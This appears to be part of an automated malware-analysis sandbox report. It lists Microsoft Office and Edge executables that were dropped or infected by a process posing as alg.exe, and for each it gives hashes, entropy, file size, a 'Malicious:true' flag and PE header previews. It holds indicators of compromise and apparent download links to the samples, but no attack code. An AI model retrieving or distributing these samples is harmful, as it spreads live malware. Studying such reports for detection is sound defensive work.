                                                                                                                                                                                                                                                                                                                                                    SHA-256:ABCD825A78B79A788611102C6E45A926223C239A78FA141DF90E9651DD5788FC
                                                                                                                                                                                                                                                                                                                                                    SHA-512:FC20CEB797B063790219F29D822E42B80CE67325191A7B61D753995FD74BD84989619DAFF72C9B43565A2CD533401CE382FEF55D0F78CC03F733718859DE61BD
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@..................................l......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1762816
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.118706883832349
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:RNmt0LDILi29RXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:ELiGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:3D5915AE0196172B167EABEA9183791D
                                                                                                                                                                                                                                                                                                                                                    SHA1:AC25CB3AEAF92490916F1B79494A0532AF78FBC5
                                                                                                                                                                                                                                                                                                                                                    SHA-256:20342387C895C5C88465CE364E7B3E208186F3B8B0EC4FB824C26270861D77D1
                                                                                                                                                                                                                                                                                                                                                    SHA-512:AB35D311C7A1828A5110E825709B1E6E022DF953A6D1046F29DC3B1E1555CDF7CFE1365A7CE208B96C3FF937E6A78F841120142CB94FE6497316E67A0791F8E7
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@...........................*................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...@(..p.......F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1762816
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.118708944902485
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:RNmt0LDILi29RXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:ELiGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:EA2103704D69D48B7B6DBB462C8A53D5
                                                                                                                                                                                                                                                                                                                                                    SHA1:E4C154382465EEEFF2608448EFBC53E0A0B44D00
                                                                                                                                                                                                                                                                                                                                                    SHA-256:A827C70641AE0685996786DE8D14D7013E2622298F18C6AD6DE32738F48083A2
                                                                                                                                                                                                                                                                                                                                                    SHA-512:3B552BF5C258E4A5132016CDEE849E728E51C760213E5526A747B336EF3E7713E4B86EF7C10E8C879FE1F2FED6E5D7638D0A36D832B76309339526249A2B033F
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@...........................*.................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...@(..p.......F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1818624
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.102348267764808
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:+juozoMGNUbTaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:WfWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:84CDBEB938EF9D17AF1B3B582EE8F6A2
                                                                                                                                                                                                                                                                                                                                                    SHA1:27198EE9BDAD67B6DC5613F1D5CE6BA31CDC04A9
                                                                                                                                                                                                                                                                                                                                                    SHA-256:27E3FF315B68395317C5D650AE56A69181B9BAD2742E81AFC02811E0191F0A50
                                                                                                                                                                                                                                                                                                                                                    SHA-512:04A13BA82FAA9A9AFFC99C7675146BFE77F4C0C1D1E9B81933830D3405A51C43FB170C5844F8F559A3B63BF3F6323C645D3181303DDB7C1233F8F94C7FC65630
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.............................p+........... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...@(..0....... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1971200
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.483650506822199
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:mbUO42q/EvsqjnhMgeiCl7G0nehbGZpbD:mxTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:90467CBC5DCB0357B3BEEF8E1D5EFAC9
                                                                                                                                                                                                                                                                                                                                                    SHA1:13DDD1BA44ABD953440E1032D32016FD1A861B81
                                                                                                                                                                                                                                                                                                                                                    SHA-256:A9C94FADAC23DDBA43B8E50DC277839E4F17D6E54C9DA498ED85BD05C03B1F3F
                                                                                                                                                                                                                                                                                                                                                    SHA-512:BD596B679477E496EE105EDA7463210ACB0CEDE85FAFC379F739B6919D654212488B6145F545FD0A88546B4585DF23D31F00424B830D08433D2F1FEAA5F92CB7
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@...........................-.....#............ ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...P(..........d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):52712960
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.961838906216664
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1572864:RLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:xicZmsR3Lo/cnLe
                                                                                                                                                                                                                                                                                                                                                    MD5:C8BCC19EFB8940553390D987387E4B95
                                                                                                                                                                                                                                                                                                                                                    SHA1:E4E1239068FDC855C2E977BAE242581D26F71249
                                                                                                                                                                                                                                                                                                                                                    SHA-256:4605026948A7C06EB9FC7E712A7E1C965E2C1A2A1838478DD1C2D62C24EB49A0
                                                                                                                                                                                                                                                                                                                                                    SHA-512:F72F04D497A71D2CC810560DFE0E7B6882946A4358CB78AE757FBBD7A189356476BAE5E759854627BAFBF5AF73A423757168A8337199DDB8B09F606237F0CFB3
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....e.$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4993536
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.81110669502057
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:flkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pLaD527BWG:9kkCqaE68eV+0ynE6LaVQBWG
                                                                                                                                                                                                                                                                                                                                                    MD5:BEADD6B3C5AC3386D1D10759A92C59E1
                                                                                                                                                                                                                                                                                                                                                    SHA1:3A8AE9C02E4BEA56B622C4DE258A1ABAB45E19ED
                                                                                                                                                                                                                                                                                                                                                    SHA-256:6FD0F77DB8F73C50A3D02F00AF9404E1CEAE292D016A008F4825867E555D53B6
                                                                                                                                                                                                                                                                                                                                                    SHA-512:2A4A94494E1462744B1AB81191B78A971ACBC3F8096F5950D113F8295560C36092FA3D32A0CA6E4519C864CC6CB64CB4A69B95D0DCD9A34063C12FA7FD6453D6
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL.....u.M......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1643520
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.81981980869985
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:pXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:psqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:3773BED7A976403A9ED066472996B853
                                                                                                                                                                                                                                                                                                                                                    SHA1:7AB6EDDDB6FDD1946622E6E7F5105109ED189AEE
                                                                                                                                                                                                                                                                                                                                                    SHA-256:8E58BCF21E8C5D128E9294E1585D405677CABBC74B200E3A2FAFADA055BD1B11
                                                                                                                                                                                                                                                                                                                                                    SHA-512:2F8AA72B914CAE30FACC0B77B73F7937D3753A11C1BFA82BE4EF03E8E10ABDC484874565AD9481F35FD43823D5251294CC30D5458ECB16207F80F469E100A88B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...........I.....................................................................%...........Rich...........PE..L....[.d............... .F...P......`?.......`....@...........................(.........................................................$...........................P}..8....................i......`d..@............`......4o.......................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....c2r.....................................rsrc...$...........................@..@.reloc... (.........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1997824
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.292439475179263
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:jyAAWSS2HUgsqjnhMgeiCl7G0nehbGZpbD:jIUMUcDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:38A3185C48FF7DFA8CAD92A74CF8BEDE
                                                                                                                                                                                                                                                                                                                                                    SHA1:769AB6AEEC12ADAFB858F577693A261A7271E39D
                                                                                                                                                                                                                                                                                                                                                    SHA-256:E12DB952DA439AB2FD30CD785D06D2261AAEB6C4DB4D9449D01B3031AF76F9AB
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C06A1C77C3AC458E3733754C28F59EB12F83093AC3C5A2AB714D923C4B3152072A686B02B0EA0205A9F412E6B19D5F2CA2D5B68C6B4C8915F05225933C33F61D
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@.d.@...A.f.@...ASf.@..z@.f.@.f.@.f.@...A.f.@Rich.f.@................PE..L......e............... .........................@..........................P.......h..................................................,T..............................8...................Hj..........@...................D...`....................text...u........................... ..`.rdata..0...........................@..@.data...............................@....c2r.................d...................rsrc...,T.......V...f..............@..@.reloc...`(.........................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1768960
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.0509553742600835
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:zgdwatXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:kbtsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:31794014806E0EB77F28D433ECDEF297
                                                                                                                                                                                                                                                                                                                                                    SHA1:E6A07CBF1BB8D60952B3D984837F8497135CB0FB
                                                                                                                                                                                                                                                                                                                                                    SHA-256:FD804E1956D887E0571ABE3231E1107137837D7D57A72CCC2CAF00196EB4537D
                                                                                                                                                                                                                                                                                                                                                    SHA-512:1FAEED7A80AD7CBE147AD40BA2DB0E0C86DDBBF9DD1AFF8F4841BC5553770361D605BC7E9E71E8571C2AC2BCA0AAD628E299F506C2D48E0D9408B3422FEAA5CC
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@...........................*......5.......................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...@(..........^..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1623040
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7998210318359744
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:P03Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:AsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:A7E73CEE6E39EB89593CC8D381DDDEBF
                                                                                                                                                                                                                                                                                                                                                    SHA1:263B125E3DFD705ACED71169069458141B7C9C09
                                                                                                                                                                                                                                                                                                                                                    SHA-256:429886AFEC1A01A925860C1C9E9504511E1274E46C8F976EA036DE0C9C43F2A5
                                                                                                                                                                                                                                                                                                                                                    SHA-512:1D1D030631E39289B4179F1133F844787B243878F5AD236BF33995F56505C9625EB36FD12AD76120954C31187FF89252BB1636AACDDB7E09AD337DCAE111DF69
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T{..T{..T{..].!.D{..4...P{..4...M{..4...X{..4...Q{.....Q{..T{..0{..1...W{..1...S{..1.M.U{..1...U{..RichT{..........................PE..L....[.d............... ."...(......x........@....@...........................(......X.......................................I.......p...............................R..8............................A..@............@..T....H..`....................text...? .......".................. ..`.rdata..(....@.......&..............@..@.data...<....`.......<..............@....rsrc........p.......>..............@..@.reloc... (..........D..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1893888
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.284188930841853
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:FAZHHrTZF/ZsqjnhMgeiCl7G0nehbGZpbD:Fe3ZFdDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:5FFD5FDE2B04379EE9D2977FFEA0C4D2
                                                                                                                                                                                                                                                                                                                                                    SHA1:27910E834E44A60DE890055476F6661EECEDC540
                                                                                                                                                                                                                                                                                                                                                    SHA-256:4436CCE4B93DBD88A17147EF61892C2E697167C8F5C4D305CF12439C887CB5A1
                                                                                                                                                                                                                                                                                                                                                    SHA-512:739F7600A1EDF499AAD0214E4F6F8DA102125E08EDFABC3BFEC40E3B11F2303F9C22CFEE44D9B3D206D5B4482B1116E919AF3D0ECED5A663509AC15319C4B89B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.e...e...e.......n..............I.......w.......p.......d.......r.......n...e...........{.......d...e.F.d.......d...Riche...........................PE..L....;.d............... .....X......q........0....@...........................,.....I...........................................x.... ...a..............................8..............................@............0..p.......`....................text............................... ..`.rdata......0......................@..@.data....,..........................@....rsrc....a... ...b..................@..@.reloc...@(..........F..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):53721600
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.543428943834304
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1572864:bNVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:bQ9lw68HSq
                                                                                                                                                                                                                                                                                                                                                    MD5:A824D670A7E61E62B9DD37A5215A44C6
                                                                                                                                                                                                                                                                                                                                                    SHA1:34C57F9718025377CD00E8D1B6B768957EB46D29
                                                                                                                                                                                                                                                                                                                                                    SHA-256:2819B413BB6B39FDE3D2407FD06DF27AB94E71222618C36B32A33B1C493504DE
                                                                                                                                                                                                                                                                                                                                                    SHA-512:ADB1A2C5892BDA0CADDCF21A452EE117E3137F3214920C75DCAC5C11E03191E01E00F122CDD965B22C7D24A21823AF3994AE268FA5E324F1953681C781802D8E
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.mj.r.9.r.9.r.9...9.r.9|..8.r.9|..8;r.9|..8.r.9|..8.r.9...8.r.9...8.r.9...8.r.9.r.9Gm.9y..8.r.9y..8.r.9y..8.o.9y..8.r.9y..9.r.9.r.9.r.9y..8.r.9Rich.r.9........PE..L......e..........".... .._.........y........@f...@.......................... 5....."U4.................................[.......h......$DW.........................,q..8...................(.q...... `.@.............`.....d........................text...,._......._................. ..`.rdata...bM...`..dM..._.............@..@.data................\..............@....detourc.............p..............@..@.c2r.....................................rsrc...$DW.....FW.................@..@.reloc....$.. ....#.................@...........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):40811520
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.461598995553934
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:786432:rbuMdv8TOUI/JgcnYblPv+msZPH53u5LBsk/Q4YbFuceo4h5ayMI5:ryM8TOtIlPv+msZPH1u5WkID5uceo4qY
                                                                                                                                                                                                                                                                                                                                                    MD5:E751AAFD687FC908ADC922D00C654AEE
                                                                                                                                                                                                                                                                                                                                                    SHA1:4D0902D149DB207250A997FA3A769CED942D4B57
                                                                                                                                                                                                                                                                                                                                                    SHA-256:A380C4BB22E77E1A874DEC4C67B20B0F9E8C6713F5B79C618D0F8ACC95F2BEDA
                                                                                                                                                                                                                                                                                                                                                    SHA-512:15930E3ED0D51F06BED6E3199CD4569147A45403BE0D27077CB6DCEB6D76516C80163F270D002D75DE7A92E20A94CC608044B3D53FC6CC3B885F5E9DAD7D4673
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j............sI.....q......q......q......q.....Jy.....Jy.....Jy.............q......q......q......q......q%.....M.....q.....Rich....................PE..L......e............... ............h.......`....@...........................o.......n.............................4...^....P..T....`...]>.............................8........................... 5..@............ ..l............................text...P........................... ..`.rdata..8.;.. ....;.................@..@.data....<.......0..................@....detourc.....0......................@..@.c2r....|....P...........................rsrc....]>..`...^>.................@..@.reloc...P....S..@...|S.............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1657344
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.63515521293864
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:fE8DMeflpnIOvYUZsqjnhMgeiCl7G0nehbGZpbD:ftDD9pnIOTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:9946191EC5A1ADF22E40F07208EEC581
                                                                                                                                                                                                                                                                                                                                                    SHA1:873A58AEAB07F9A63B6C56B8CA8648A48616F416
                                                                                                                                                                                                                                                                                                                                                    SHA-256:6F5CD41BAB2498EAAF0B8824DA6F0311424BAD1B6D72FD0344A853F330B423EF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2C5C0E3737CCCEE834DC990C69A879E9B16D21231DFDC262AF74671F4D8DD835893947FAE1E1A706760A425E563BCF7353A099D5417BE7B75E142B628712C91
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
